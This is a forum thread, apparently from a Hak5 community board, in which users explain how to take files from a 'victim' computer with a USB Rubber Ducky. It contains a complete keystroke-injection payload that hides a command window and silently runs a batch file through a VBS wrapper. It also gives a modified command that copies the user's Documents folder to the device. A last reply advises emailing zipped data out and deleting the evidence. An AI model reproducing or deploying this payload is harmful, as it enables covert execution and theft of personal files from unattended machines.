Saving file from victims computer to the usb rubber ducky

[webdesigner601]

Hi,

I just bought a usb rubber ducky and I was wondering is it possible to save files directly from the victim pc to the rubber ducky. As in if I used the payload to gather computer information, would I be able to save that straight from the victim pc to the rubber ducky?

Looking for any feedback in a fair bit of detail if possible. Thanks guys

[MuddDuck]

I second this. I would love to know if this is possible

[overwraith]

It is possible, but not advisable, because the USB rubber ducky has very slow memory. Best to get a small 2 port hub/connector and use it to plug in both a USB rubber ducky and an exfiltration drive. The second flash drive will make the process much faster. One of the payloads that operates using this concept is the RunEXE from SD payload.

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---runexe-from-sd

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts. 
REM Encoder V2.4
REM Using the run command for a broader OS base. 
DEFAULT_DELAY 25
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected. 
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') 
do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

Don't use the one that uses the diskpart command, has been shown to only run on admin computers.

I kinda wish there were two flavors of duck, one that we can just litter parking lots with, and another that is slightly more expensive, and has faster upload speeds for exfiltration/reconnaissance tasks.

Edited May 11, 2014 by overwraith

[webdesigner601]

Say I was adamant about doing it on the ducky. How would I go about doing it?

[overwraith]

So you want to save to the ducky. I may have misunderstood what you wanted, but I think it is still possible. You need to install the twin duck firmware:

https://code.google.com/p/ducky-decode/downloads/list

And modify the batch portion of the run exe from sd to the commands you want to run, basically this is the line that runs the file in the run exe from sd payload:

REM Continue script.
STRING START %myd%\HelloWorld.exe

Basically replace your commands there.

[webdesigner601]

I'm sorry I'm still a little unclear about how I would go about doing that. Could u please clarify

[overwraith]

This, when typed in makes a batch file that waits for the SD card to mount:

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') 
do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER

When the SD card has mounted the program goes to ":break", exectuing the continue part of the script. You can access the drive letter using %myd%, so if you wanted a specific file to be copied to the SD card you would go:

copy %userprofile%\Documents\* %myd%

I think you might need a few extra flags to the copy command, but that's basically what you do. So instead of executing an executable like what the payload was designed to do, you swap out for this command.

[cooper]

Aside from the practical problem of the ducky having slow memory, the point of the ducky is that the OS will accept it without any additional user input or notification. No additional drivers will need to be installed, pretty much no system is setup in such a way that it rejects an additional keyboard. With the usb storage, these rules don't apply and in a lot of the more interesting locations adding a thumbdrive would do nothing at best and raise alarms at its worst.

If you truly MUST get a hold of file data, I would suggest you write out the process of creating a zipfile containing the interesting bits and have the machine mail the data to you, removing the sent mail and zipfile afterwards. Alternatively you could use an FTP upload, but this is likely to be restricted via networking rules.